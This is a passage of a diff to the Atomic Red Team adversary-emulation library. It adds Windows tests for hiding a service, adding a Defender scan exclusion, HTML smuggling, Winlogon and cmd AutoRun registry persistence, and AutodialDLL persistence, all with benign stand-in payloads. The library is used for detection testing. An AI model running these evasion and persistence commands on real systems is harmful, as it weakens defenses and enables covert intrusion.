+  - Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
 

atomics/Indexes/Matrices/matrix.md

@@ -87,7 +87,7 @@
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) |  |  |  |  |  |  |  |
-|  |  | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  |  |  |
+|  |  | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -117,7 +117,7 @@
 |  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution](../../T1546/T1546.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Authentication Package](../../T1547.002/T1547.002.md) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) |  |  |  |  |  |  |  |
 |  |  | Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -177,7 +177,7 @@
 |  |  |  |  | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [HTML Smuggling](../../T1027.006/T1027.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -64,7 +64,7 @@
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) |  |  |  |  |  |  |  |
 |  |  | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) |  |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution](../../T1546/T1546.md) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) |  |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Create Process with Token](../../T1134.002/T1134.002.md) |  |  |  |  |  |  |  |
@@ -83,7 +83,7 @@
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) |  |  |  |  |  |  |  |
 |  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) |  |  |  |  |  |  |  |
-|  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution](../../T1546/T1546.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Authentication Package](../../T1547.002/T1547.002.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -136,7 +136,7 @@
 |  |  |  |  | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [HTML Smuggling](../../T1027.006/T1027.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) |  |  |  |  |  |  |  |

atomics/Indexes/index.yaml

@@ -3643,6 +3643,35 @@ defense-evasion:
         elevation_required: true
         command: New-LocalUser -Name "Administrator " -NoPassword
         cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null
+    - name: Create and Hide a Service with sc.exe
+      auto_generated_guid: 333c7de0-6fbe-42aa-ac2b-c7e40b18246a
+      description: |
+        The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query.
+
+        Upon successful execution, sc.exe creates a new service changes the security descriptor.
+
+        https://twitter.com/Alh4zr3d/status/1580925761996828672
+        https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
+      supported_platforms:
+      - windows
+      input_arguments:
+        service_name:
+          description: Name of service to create
+          type: String
+          default: AtomicService
+        executable_command:
+          description: Command to execute as a service
+          type: String
+          default: C:\Windows\System32\calc.exe
+      executor:
+        command: |
+          sc.exe create #{service_name} binPath= "#{executable_command}"
+          sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
+        cleanup_command: 'sc.exe delete #{service_name}
+
+          '
+        name: command_prompt
+        elevation_required: true
   T1484.002:
     technique:
       x_mitre_platforms:
@@ -6277,7 +6306,7 @@ defense-evasion:
       supported_platforms:
       - windows
       executor:
-        command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing
+        command: 'Set-PSReadlineOption -HistorySaveStyle SaveNothing
 
           '
         name: powershell
@@ -14357,7 +14386,8 @@ defense-evasion:
           Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/AllTheThings.iso -OutFile "#{path_of_iso}"
       executor:
         command: |
-          $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+          Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+          $keep = Get-Volume -FileSystemLabel "AllTheThings"
           $driveLetter = ($keep | Get-Volume).DriveLetter
           $instance = [activator]::CreateInstance([type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}"))
           $instance.Document.Application.ShellExecute($driveLetter+":\document.lnk","",$driveLetter+":\",$null,0)
@@ -18159,6 +18189,24 @@ defense-evasion:
           Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
         name: powershell
         elevation_required: true
+    - name: WMIC Tamper with Windows Defender Evade Scanning Folder
+      auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
+      description: |
+        The following Atomic will attempt to exclude a folder within Defender leveraging WMI
+        Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
+      supported_platforms:
+      - windows
+      executor:
+        command: 'wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference
+          call Add ExclusionPath=\"ATOMICREDTEAM\"
+
+          '
+        cleanup_command: 'wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class
+          MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
+
+          '
+        name: command_prompt
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:
@@ -22969,7 +23017,34 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1027.006
+    atomic_tests:
+    - name: HTML Smuggling Remote Payload
+      auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
+      description: "The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso)
+        without userinteraction. \nThe HTML file is based off of the work from [Stan
+        Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)\n"
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: 'T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
+
+          '
+        prereq_command: 'if (Test-Path PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html)
+          { exit 0} else { exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
+      executor:
+        command: 'PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html
+
+          '
+        cleanup_command: "$user = [System.Environment]::UserName; Remove-Item -Path
+          C:\\Users\\$user\\Downloads\\FeelTheBurn.iso"
+        name: powershell
+        elevation_required: false
   T1556.005:
     technique:
       x_mitre_platforms:
@@ -33781,6 +33856,52 @@ privilege-escalation:
         cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
           -Force -ErrorAction Ignore
 
+          '
+        name: powershell
+    - name: Winlogon HKLM Shell Key Persistence - PowerShell
+      auto_generated_guid: 95a3c42f-8c88-4952-ad60-13b81d929a9d
+      description: |
+        PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
+
+        Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_to_execute:
+          description: Path of binary to execute
+          type: Path
+          default: C:\Windows\System32\cmd.exe
+      executor:
+        command: 'Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
+          "Shell" "explorer.exe, #{binary_to_execute}" -Force
+
+          '
+        cleanup_command: 'Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows
+          NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
+
+          '
+        name: powershell
+    - name: Winlogon HKLM Userinit Key Persistence - PowerShell
+      auto_generated_guid: f9b8daff-8fa7-4e6a-a1a7-7c14675a545b
+      description: |
+        PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
+
+        Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_to_execute:
+          description: Path of binary to execute
+          type: Path
+          default: C:\Windows\System32\cmd.exe
+      executor:
+        command: 'Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
+          "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
+
+          '
+        cleanup_command: 'Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows
+          NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
+
           '
         name: powershell
   T1546.012:
@@ -36616,6 +36737,48 @@ privilege-escalation:
           Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
         name: powershell
         elevation_required: true
+    - name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
+      auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
+      description: |-
+        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+      supported_platforms:
+      - windows
+      input_arguments:
+        command:
+          description: Command to Execute
+          type: string
+          default: notepad.exe
+      executor:
+        command: New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor"
+          -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+        cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command
+          Processor" -Name "AutoRun" -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
+      auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
+      description: |-
+        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+      supported_platforms:
+      - windows
+      input_arguments:
+        command:
+          description: Command to Execute
+          type: string
+          default: notepad.exe
+      executor:
+        command: |-
+          $path = "HKCU:\Software\Microsoft\Command Processor"
+          if (!(Test-Path -path $path)){
+            New-Item -ItemType Key -Path $path
+          }
+          New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
+          Processor" -Name "AutoRun" -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
   T1547.006:
     technique:
       x_mitre_platforms:
@@ -37572,7 +37735,37 @@ privilege-escalation:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
       - 'Command: Command Execution'
-    atomic_tests: []
+      identifier: T1546
+    atomic_tests:
+    - name: Persistence with Custom AutodialDLL
+      auto_generated_guid: aca9ae16-7425-4b6d-8c30-cad306fdbd5b
+      description: "The DLL pointed to by the AutodialDLL registry key is loaded every
+        time a process connects to the internet. Attackers can gain persistent code
+        execution by setting this key to a DLL of their choice. \n\nThe sample dll
+        provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping
+        a web browser such as MS Edge or Chrome should result in the dll executing.\n[Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/)\n"
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: 'AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
+
+          '
+        prereq_command: 'if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll)
+          { exit 0} else { exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\T1546\bin\" -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/bin/AltWinSock2DLL.dll" -OutFile "PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll"
+      executor:
+        command: 'Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters
+          -Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
+
+          '
+        cleanup_command: Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters
+          -Name AutodialDLL -Value  $env:windir\system32\rasadhlp.dll
+        name: powershell
+        elevation_required: true
   T1546.004:
     technique:
       x_mitre_platforms:
@@ -41217,6 +41410,7 @@ privilege-escalation:
           description: Path to DLL
           type: Path
           default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll
+      dependency_executor_name: powershell
       dependencies:
       - description: 'Helper DLL must exist on disk at specified location (#{helper_file})
 
@@ -41228,9 +41422,9 @@ privilege-escalation:
           New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}"
       executor:
-        command: 'netsh.exe add helper #{helper_file}
-
-          '
+        command: |
+          netsh.exe add helper #{helper_file}
+          taskkill /im notepad.exe /t /f > NUL 2>&1
         cleanup_command: 'netsh.exe delete helper #{helper_file}
 
           '
@@ -53677,7 +53871,7 @@ persistence:
         web_shells:
           description: Path of Web Shell
           type: Path
-          default: PathToAtomicsFolder\T1505.003\src\
+          default: PathToAtomicsFolder\T1505.003\src
       dependency_executor_name: powershell
       dependencies:
       - description: 'Web shell must exist on disk at specified location (#{web_shells})
@@ -55023,6 +55217,52 @@ persistence:
         cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
           -Force -ErrorAction Ignore
 
+          '
+        name: powershell
+    - name: Winlogon HKLM Shell Key Persistence - PowerShell
+      auto_generated_guid: 95a3c42f-8c88-4952-ad60-13b81d929a9d
+      description: |
+        PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
+
+        Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_to_execute:
+          description: Path of binary to execute
+          type: Path
+          default: C:\Windows\System32\cmd.exe
+      executor:
+        command: 'Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
+          "Shell" "explorer.exe, #{binary_to_execute}" -Force
+
+          '
+        cleanup_command: 'Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows
+          NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
+
+          '
+        name: powershell
+    - name: Winlogon HKLM Userinit Key Persistence - PowerShell
+      auto_generated_guid: f9b8daff-8fa7-4e6a-a1a7-7c14675a545b
+      description: |
+        PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
+
+        Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_to_execute:
+          description: Path of binary to execute
+          type: Path
+          default: C:\Windows\System32\cmd.exe
+      executor:
+        command: 'Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
+          "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
+
+          '
+        cleanup_command: 'Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows
+          NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
+
           '
         name: powershell
   T1019:
@@ -58592,6 +58832,48 @@ persistence:
           Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
         name: powershell
         elevation_required: true
+    - name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
+      auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
+      description: |-
+        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+      supported_platforms:
+      - windows
+      input_arguments:
+        command:
+          description: Command to Execute
+          type: string
+          default: notepad.exe
+      executor:
+        command: New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor"
+          -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+        cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command
+          Processor" -Name "AutoRun" -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
+      auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
+      description: |-
+        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+      supported_platforms:
+      - windows
+      input_arguments:
+        command:
+          description: Command to Execute
+          type: string
+          default: notepad.exe
+      executor:
+        command: |-
+          $path = "HKCU:\Software\Microsoft\Command Processor"
+          if (!(Test-Path -path $path)){
+            New-Item -ItemType Key -Path $path
+          }
+          New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
+          Processor" -Name "AutoRun" -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
   T1136.003:
     technique:
       x_mitre_platforms:
@@ -60281,7 +60563,37 @@ persistence:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
       - 'Command: Command Execution'
-    atomic_tests: []
+      identifier: T1546
+    atomic_tests:
+    - name: Persistence with Custom AutodialDLL
+      auto_generated_guid: aca9ae16-7425-4b6d-8c30-cad306fdbd5b
+      description: "The DLL pointed to by the AutodialDLL registry key is loaded every
+        time a process connects to the internet. Attackers can gain persistent code
+        execution by setting this key to a DLL of their choice. \n\nThe sample dll
+        provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping
+        a web browser such as MS Edge or Chrome should result in the dll executing.\n[Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/)\n"
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: 'AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
+
+          '
+        prereq_command: 'if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll)
+          { exit 0} else { exit 1}
+
+          '
+        get_prereq_command: |
